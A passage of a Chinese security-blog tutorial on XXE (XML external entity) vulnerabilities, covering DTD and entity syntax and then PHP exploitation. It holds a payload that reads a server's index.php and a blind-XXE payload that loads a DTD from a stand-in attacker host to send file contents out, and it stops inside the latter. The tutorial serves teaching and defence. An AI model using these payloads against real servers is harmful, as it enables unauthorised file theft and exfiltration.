<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Web安全之XXE漏洞 | UltramanGaia&#39;s Blog</title>
  <meta name="keywords" content=" XXE ">
  <meta name="description" content="Web安全之XXE漏洞 | UltramanGaia&#39;s Blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta property="og:type" content="website">
<meta property="og:title" content="categories">
<meta property="og:url" content="http://ultramangaia.github.io/categories/index.html">
<meta property="og:site_name" content="UltramanGaia&#39;s Blog">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2017-12-23T08:37:16.000Z">
<meta property="article:modified_time" content="2019-01-19T16:10:04.947Z">
<meta property="article:author" content="UltramanGaia">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/sublime.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 4.2.1"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
</div>


<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>UltramanGaia</span>
</div>

<div class="icon">
    
        
        <a title="rss" href="/atom.xml" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-rss"></use>
                </svg>
            
        </a>
        
    
        
        <a title="github" href="https://github.com/UltramanGaia" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-github"></use>
                </svg>
            
        </a>
        
    
        
    
        
        <a title="email" href="mailto:3213359017@qq.com" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-email"></use>
                </svg>
            
        </a>
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=3213359017&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
</div>




<ul>
    <li><div class="all active" data-rel="全部文章">全部文章<small>(35)</small></div></li>
    
        
            
            <li><div data-rel="Web"><i class="fold iconfont icon-right"></i>Web<small>(26)</small></div>
                
                    <ul class="sub hide">
                        
                        <li><div data-rel="Web<--->Web安全">Web安全<small>(7)</small></div>
                            
                        </li>
                            
                        <li><div data-rel="Web<--->Writeup">Writeup<small>(14)</small></div>
                            
                        </li>
                            
                        <li><div data-rel="Web<--->漏洞挖掘">漏洞挖掘<small>(5)</small></div>
                            
                        </li>
                            
                    </ul>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Java"><i class="fold iconfont icon-right"></i>Java<small>(1)</small></div>
                
                    <ul class="sub hide">
                        
                        <li><div data-rel="Java<--->Java安全">Java安全<small>(1)</small></div>
                            
                        </li>
                            
                    </ul>
                
            </li>
            
        
    
        
            
            <li><div data-rel="PHP"><i class="fold iconfont icon-right"></i>PHP<small>(4)</small></div>
                
                    <ul class="sub hide">
                        
                        <li><div data-rel="PHP<--->PHP安全">PHP安全<small>(1)</small></div>
                            
                        </li>
                            
                        <li><div data-rel="PHP<--->漏洞分析">漏洞分析<small>(3)</small></div>
                            
                        </li>
                            
                    </ul>
                
            </li>
            
        
    
        
            
            <li><div data-rel="其它"><i class="fold iconfont icon-right"></i>其它<small>(3)</small></div>
                
                    <ul class="sub hide">
                        
                        <li><div data-rel="其它<--->智能合约">智能合约<small>(2)</small></div>
                            
                        </li>
                            
                        <li><div data-rel="其它<--->机器学习">机器学习<small>(1)</small></div>
                            
                        </li>
                            
                    </ul>
                
            </li>
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
            <li><div data-rel="二进制"><i class="fold iconfont icon-right"></i>二进制<small>(1)</small></div>
                
                    <ul class="sub hide">
                        
                        <li><div data-rel="二进制<--->PWN">PWN<small>(1)</small></div>
                            
                        </li>
                            
                    </ul>
                
            </li>
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="35">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://ultramangaia.cn/">UltramanGaia</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" />
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ctf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Java</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>lua</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PWN</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>SQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sqlmap</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>stackoverflow</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ThinkPHP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>writeup</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>XSS</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>XSSI</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>XXE</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ysoserial</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>代码执行</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>反序列化</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>命令注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文件上传</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>智能合约</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>机器学习</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞分析</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞挖掘</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>请求走私</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        <a id="top" class="全部文章 Web 漏洞挖掘 "
           href="/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html"
           data-tag="漏洞挖掘,lua"
           data-author="" >
            <span class="post-title" title="小米系列路由器远程命令执行漏洞（CVE-2019-18370，CVE-2019-18371）">小米系列路由器远程命令执行漏洞（CVE-2019-18370，CVE-2019-18371）</span>
            <span class="post-date" title="2019-03-09 14:41:12">2019/03/09</span>
        </a>
        
        <a id="top" class="全部文章 Web 漏洞挖掘 "
           href="/blog/2020/OpenResty%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E6%BC%8F%E6%B4%9E-CVE-2020-11724.html"
           data-tag="请求走私"
           data-author="" >
            <span class="post-title" title="OpenResty请求走私漏洞（CVE-2020-11724）">OpenResty请求走私漏洞（CVE-2020-11724）</span>
            <span class="post-date" title="2020-02-10 10:00:41">2020/02/10</span>
        </a>
        
        <a id="top" class="全部文章 Web 漏洞挖掘 "
           href="/blog/2020/WebswingJsLink%E6%9C%BA%E5%88%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2020-11103.html"
           data-tag="代码执行"
           data-author="" >
            <span class="post-title" title="Webswing JsLink机制远程代码执行漏洞（CVE-2020-11103）">Webswing JsLink机制远程代码执行漏洞（CVE-2020-11103）</span>
            <span class="post-date" title="2020-03-10 10:00:41">2020/03/10</span>
        </a>
        
        <a  class="全部文章 Web 漏洞挖掘 "
           href="/blog/2020/Webswing-JsLink-Mechanism-Remote-Code-Execution-Vulnerability-CVE-2020-11103.html"
           data-tag="代码执行"
           data-author="" >
            <span class="post-title" title="Webswing JsLink Mechanism Remote Code Execution Vulnerability（CVE-2020-11103）">Webswing JsLink Mechanism Remote Code Execution Vulnerability（CVE-2020-11103）</span>
            <span class="post-date" title="2020-03-10 10:00:41">2020/03/10</span>
        </a>
        
        <a  class="全部文章 Web 漏洞挖掘 "
           href="/blog/2020/OpenResty-Http-Request-Smuggling-Vulnerability-CVE-2020-11724.html"
           data-tag="请求走私"
           data-author="" >
            <span class="post-title" title="OpenResty Http request smuggling Vulnerability（CVE-2020-11724）">OpenResty Http request smuggling Vulnerability（CVE-2020-11724）</span>
            <span class="post-date" title="2020-02-10 10:00:41">2020/02/10</span>
        </a>
        
        <a  class="全部文章 Web Web安全 "
           href="/blog/2018/Web%E5%AE%89%E5%85%A8%E4%B9%8BXSSI%E6%BC%8F%E6%B4%9E.html"
           data-tag="XSSI"
           data-author="" >
            <span class="post-title" title="Web安全之XSSI漏洞">Web安全之XSSI漏洞</span>
            <span class="post-date" title="2018-10-18 16:25:02">2018/10/18</span>
        </a>
        
        <a  class="全部文章 Java Java安全 "
           href="/blog/2018/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.html"
           data-tag="Java,ysoserial,反序列化"
           data-author="" >
            <span class="post-title" title="Java反序列化漏洞">Java反序列化漏洞</span>
            <span class="post-date" title="2018-10-18 16:25:02">2018/10/18</span>
        </a>
        
        <a  class="全部文章 PHP 漏洞分析 "
           href="/blog/2018/ThinkPHP-3-X-5-X-order-by%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html"
           data-tag="漏洞分析,ThinkPHP,SQL"
           data-author="" >
            <span class="post-title" title="ThinkPHP 3.X-5.X order by注入漏洞分析">ThinkPHP 3.X-5.X order by注入漏洞分析</span>
            <span class="post-date" title="2018-09-14 10:00:41">2018/09/14</span>
        </a>
        
        <a  class="全部文章 其它 智能合约 "
           href="/blog/2018/Ethernaut%E9%9D%B6%E5%9C%BAwriteup.html"
           data-tag="writeup,智能合约"
           data-author="" >
            <span class="post-title" title="Ethernaut 靶场 Writeup">Ethernaut 靶场 Writeup</span>
            <span class="post-date" title="2018-06-01 18:12:04">2018/06/01</span>
        </a>
        
        <a  class="全部文章 其它 智能合约 "
           href="/blog/2018/0ctf-%E7%BA%BF%E4%B8%8B-misc-ZeroLottery.html"
           data-tag="ctf,writeup,智能合约"
           data-author="" >
            <span class="post-title" title="0CTF 线下 Misc ZeroLottery Writeup">0CTF 线下 Misc ZeroLottery Writeup</span>
            <span class="post-date" title="2018-05-29 19:10:40">2018/05/29</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2018/starctf-ctf-2018.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="StarCTF 2018 Writeup">StarCTF 2018 Writeup</span>
            <span class="post-date" title="2018-04-23 20:50:00">2018/04/23</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2018/ddctf-ctf-2018.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="DDCTF 2018 Writeup">DDCTF 2018 Writeup</span>
            <span class="post-date" title="2018-04-21 03:38:49">2018/04/21</span>
        </a>
        
        <a  class="全部文章 PHP 漏洞分析 "
           href="/blog/2018/DedeCMS5-7%E5%90%8E%E5%8F%B0%E4%B8%A4%E5%A4%84Getshell%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html"
           data-tag="漏洞分析"
           data-author="" >
            <span class="post-title" title="DedeCMS 5.7 后台两处RCE漏洞分析">DedeCMS 5.7 后台两处RCE漏洞分析</span>
            <span class="post-date" title="2018-04-15 20:50:27">2018/04/15</span>
        </a>
        
        <a  class="全部文章 PHP 漏洞分析 "
           href="/blog/2018/Drupal-Drupalgeddon-2-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-CVE-2018-7600.html"
           data-tag="漏洞分析"
           data-author="" >
            <span class="post-title" title="Drupal Drupalgeddon 2远程代码执行漏洞分析">Drupal Drupalgeddon 2远程代码执行漏洞分析</span>
            <span class="post-date" title="2018-04-15 01:37:57">2018/04/15</span>
        </a>
        
        <a  class="全部文章 Web Web安全 "
           href="/blog/2018/Web%E5%AE%89%E5%85%A8%E4%B9%8B%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html"
           data-tag="命令注入"
           data-author="" >
            <span class="post-title" title="Web安全之命令注入漏洞">Web安全之命令注入漏洞</span>
            <span class="post-date" title="2018-04-08 19:56:45">2018/04/08</span>
        </a>
        
        <a  class="全部文章 Web Web安全 "
           href="/blog/2018/Web%E5%AE%89%E5%85%A8%E4%B9%8BXXE%E6%BC%8F%E6%B4%9E.html"
           data-tag="XXE"
           data-author="" >
            <span class="post-title" title="Web安全之XXE漏洞">Web安全之XXE漏洞</span>
            <span class="post-date" title="2018-04-06 11:53:41">2018/04/06</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2018/0ctf-ctf-2018.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="0CTF 2018 Writeup">0CTF 2018 Writeup</span>
            <span class="post-date" title="2018-04-03 16:53:31">2018/04/03</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2018/%E5%BC%BA%E7%BD%91%E6%9D%AF-ctf-2018.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="强网杯 CTF 2018 Writeup">强网杯 CTF 2018 Writeup</span>
            <span class="post-date" title="2018-03-30 12:47:57">2018/03/30</span>
        </a>
        
        <a  class="全部文章 Web Web安全 "
           href="/blog/2018/Web%E5%AE%89%E5%85%A8%E4%B9%8BXSS%E6%BC%8F%E6%B4%9E.html"
           data-tag="XSS"
           data-author="" >
            <span class="post-title" title="Web安全之XSS漏洞">Web安全之XSS漏洞</span>
            <span class="post-date" title="2018-03-26 17:57:09">2018/03/26</span>
        </a>
        
        <a  class="全部文章 二进制 PWN "
           href="/blog/2018/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8%E4%B9%8B%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E.html"
           data-tag="PWN,stackoverflow"
           data-author="" >
            <span class="post-title" title="二进制安全之栈溢出漏洞">二进制安全之栈溢出漏洞</span>
            <span class="post-date" title="2018-03-26 00:51:47">2018/03/26</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2018/pragyan-ctf-2018.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="Pragyan CTF 2018 Writeup">Pragyan CTF 2018 Writeup</span>
            <span class="post-date" title="2018-03-03 00:48:28">2018/03/03</span>
        </a>
        
        <a  class="全部文章 PHP PHP安全 "
           href="/blog/2018/PHP%E5%AE%89%E5%85%A8%E4%B9%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E.html"
           data-tag="PHP"
           data-author="" >
            <span class="post-title" title="PHP安全之文件包含漏洞">PHP安全之文件包含漏洞</span>
            <span class="post-date" title="2018-03-02 19:21:59">2018/03/02</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2018/Xiomara-ctf-2018.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="Xiomara CTF 2018 Writeup">Xiomara CTF 2018 Writeup</span>
            <span class="post-date" title="2018-02-28 20:23:22">2018/02/28</span>
        </a>
        
        <a  class="全部文章 Web Web安全 "
           href="/blog/2018/Web%E5%AE%89%E5%85%A8%E4%B9%8BSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html"
           data-tag="SQL"
           data-author="" >
            <span class="post-title" title="Web安全之SQL注入漏洞">Web安全之SQL注入漏洞</span>
            <span class="post-date" title="2018-02-23 13:57:25">2018/02/23</span>
        </a>
        
        <a  class="全部文章 Web Web安全 "
           href="/blog/2018/Web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html"
           data-tag="文件上传"
           data-author="" >
            <span class="post-title" title="Web安全之文件上传漏洞">Web安全之文件上传漏洞</span>
            <span class="post-date" title="2018-02-11 11:27:17">2018/02/11</span>
        </a>
        
        <a  class="全部文章 其它 机器学习 "
           href="/blog/2017/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0.html"
           data-tag="机器学习"
           data-author="" >
            <span class="post-title" title="机器学习">机器学习</span>
            <span class="post-date" title="2017-12-27 14:38:27">2017/12/27</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2017/DVWA-%E9%9D%B6%E5%9C%BA-writeup.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="DVWA 靶场 Writeup">DVWA 靶场 Writeup</span>
            <span class="post-date" title="2017-12-05 20:00:04">2017/12/05</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2017/webug3-0-writeup.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="Webug3.0 靶场 Writeup">Webug3.0 靶场 Writeup</span>
            <span class="post-date" title="2017-12-04 19:46:57">2017/12/04</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2017/%E5%BC%BA%E7%BD%91%E6%9D%AF-ctf-2017.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="强网杯 CTF 2017 Writeup">强网杯 CTF 2017 Writeup</span>
            <span class="post-date" title="2017-11-27 19:36:03">2017/11/27</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2017/gctf-ctf-2017.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="GCTF 2017 Writeup">GCTF 2017 Writeup</span>
            <span class="post-date" title="2017-11-27 19:31:56">2017/11/27</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2017/%E4%B8%96%E5%AE%89%E6%9D%AF-ctf-2017.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="世安杯 CTF 2017 Writeup">世安杯 CTF 2017 Writeup</span>
            <span class="post-date" title="2017-11-27 19:21:19">2017/11/27</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2017/pwn2win-ctf-2017.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="Pwn2win CTF 2017 Writeup">Pwn2win CTF 2017 Writeup</span>
            <span class="post-date" title="2017-11-27 19:11:00">2017/11/27</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2017/%E6%B9%96%E6%B9%98%E6%9D%AF-2017-ctf.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="湖湘杯 CTF 2017 Writeup">湖湘杯 CTF 2017 Writeup</span>
            <span class="post-date" title="2017-11-25 19:42:32">2017/11/25</span>
        </a>
        
        <a  class="全部文章 Web Writeup "
           href="/blog/2017/hitcon-ctf-2017.html"
           data-tag="ctf,writeup"
           data-author="" >
            <span class="post-title" title="Hitcon CTF 2017 Writeup">Hitcon CTF 2017 Writeup</span>
            <span class="post-date" title="2017-11-06 17:34:33">2017/11/06</span>
        </a>
        
        <a  class="全部文章 Web Web安全 "
           href="/blog/2017/%E7%BC%96%E5%86%99sqlmap-Tamper%E7%BB%95%E8%BF%87Waf.html"
           data-tag="ctf,sqlmap"
           data-author="" >
            <span class="post-title" title="编写sqlmap Tamper绕过Waf">编写sqlmap Tamper绕过Waf</span>
            <span class="post-date" title="2017-10-12 17:10:31">2017/10/12</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-Web安全之XXE漏洞" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">Web安全之XXE漏洞</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="Web">Web</a> > 
            
            <a  data-rel="Web&lt;---&gt;Web安全">Web安全</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color4">XXE</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2020-07-16 00:52:42'>2018-04-06 11:53</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#XML应用场景"><span class="toc-text">XML应用场景</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XML文档结构"><span class="toc-text">XML文档结构</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DTD介绍"><span class="toc-text">DTD介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#内部声明DTD"><span class="toc-text">内部声明DTD</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#外部声明DTD"><span class="toc-text">外部声明DTD</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#内部实体"><span class="toc-text">内部实体</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#外部实体"><span class="toc-text">外部实体</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XXE-XML-External-Entity-Injection-漏洞"><span class="toc-text">XXE (XML External Entity Injection)漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#PHP-XXE-漏洞利用"><span class="toc-text">PHP XXE 漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#正常payload"><span class="toc-text">正常payload</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#读取文件payload"><span class="toc-text">读取文件payload</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#无回显payload"><span class="toc-text">无回显payload</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#端口扫描"><span class="toc-text">端口扫描</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞防御"><span class="toc-text">漏洞防御</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Java-xxe-漏洞利用"><span class="toc-text">Java xxe 漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#列目录"><span class="toc-text">列目录</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞防御-1"><span class="toc-text">漏洞防御</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#简化利用方式"><span class="toc-text">简化利用方式</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="XML应用场景"><a href="#XML应用场景" class="headerlink" title="XML应用场景"></a>XML应用场景</h2><ol>
<li>数据传输</li>
<li>配置文件</li>
<li>数据存储(小型数据库)</li>
</ol>
<h2 id="XML文档结构"><a href="#XML文档结构" class="headerlink" title="XML文档结构"></a>XML文档结构</h2><ol>
<li><p>文档声明</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; standalone=&quot;yes&quot; ?&gt;</code></pre>
</li>
<li><p>DTD文档类型定义(可选)<br>文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。<br>DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。</p>
</li>
<li><p>元素<br>XML文档有且只有一个root元素<br>标签对应元素</p>
</li>
<li><p>属性<br>元素的属性参考HTML</p>
</li>
<li><p>注释</p>
<pre><code class="xml">&lt;!-- 注释 --&gt;</code></pre>
</li>
<li><p>CDATA区、特殊字符<br>CDATA节，保存纯字节数据，不会被引擎解析</p>
<pre><code class="xml">&lt;![CDATA[
 ...........
]]&gt;</code></pre>
</li>
<li><p>处理指令</p>
</li>
</ol>
<h2 id="DTD介绍"><a href="#DTD介绍" class="headerlink" title="DTD介绍"></a>DTD介绍</h2><h3 id="内部声明DTD"><a href="#内部声明DTD" class="headerlink" title="内部声明DTD"></a>内部声明DTD</h3><pre><code class="xml">&lt;!DOCTYPE 根元素名称 [元素声明]&gt;</code></pre>
<h3 id="外部声明DTD"><a href="#外部声明DTD" class="headerlink" title="外部声明DTD"></a>外部声明DTD</h3><pre><code class="xml">&lt;!DOCTYPE 根元素名称 SYSTEM &quot;URI/URL&quot;&gt;
或者
&lt;!DOCTYPE 根元素名称 PUBLIC &quot;公共名称&quot; &quot;URL&quot;&gt;</code></pre>
<h3 id="内部实体"><a href="#内部实体" class="headerlink" title="内部实体"></a>内部实体</h3><pre><code class="xml">&lt;!ENTITY 实体名称 &quot;实体的值&quot;&gt;</code></pre>
<h3 id="外部实体"><a href="#外部实体" class="headerlink" title="外部实体"></a>外部实体</h3><pre><code class="xml">&lt;!ENTITY 实体名称 SYSTEM &quot;URI&quot;&gt;</code></pre>
<h2 id="XXE-XML-External-Entity-Injection-漏洞"><a href="#XXE-XML-External-Entity-Injection-漏洞" class="headerlink" title="XXE (XML External Entity Injection)漏洞"></a>XXE (XML External Entity Injection)漏洞</h2><p>XXE漏洞发生在服务端在解析用户上传的(污染的)XML文件时，没有禁止外部实体的加载，导致可以加载外部文件</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>可实现的能力</p>
<blockquote>
<p>文件读取<br>扫描内网<br>命令执行</p>
</blockquote>
<h3 id="PHP-XXE-漏洞利用"><a href="#PHP-XXE-漏洞利用" class="headerlink" title="PHP XXE 漏洞利用"></a>PHP XXE 漏洞利用</h3><h4 id="正常payload"><a href="#正常payload" class="headerlink" title="正常payload"></a>正常payload</h4><pre><code class="xml">
&lt;root&gt;
    &lt;user&gt;admin&lt;/user&gt;
    &lt;pass&gt;password&lt;/pass&gt;
&lt;/root&gt;</code></pre>
<h4 id="读取文件payload"><a href="#读取文件payload" class="headerlink" title="读取文件payload"></a>读取文件payload</h4><pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY data SYSTEM &quot;php://filter/convert.base64-encode/resource=index.php&quot;&gt;]&gt;
&lt;root&gt;&amp;data;&lt;/root&gt;</code></pre>
<h4 id="无回显payload"><a href="#无回显payload" class="headerlink" title="无回显payload"></a>无回显payload</h4><p>发送的xml</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE data [
&lt;!ENTITY % file SYSTEM &quot;php://filter/convert.base64-encode/resource=../../../../index.php&quot;&gt;
&lt;!ENTITY % dtd SYSTEM &quot;http://myvps.com/file.dtd&quot;&gt;
%dtd; %all;
]&gt;
&lt;value&gt;&amp;send;&lt;/value&gt;
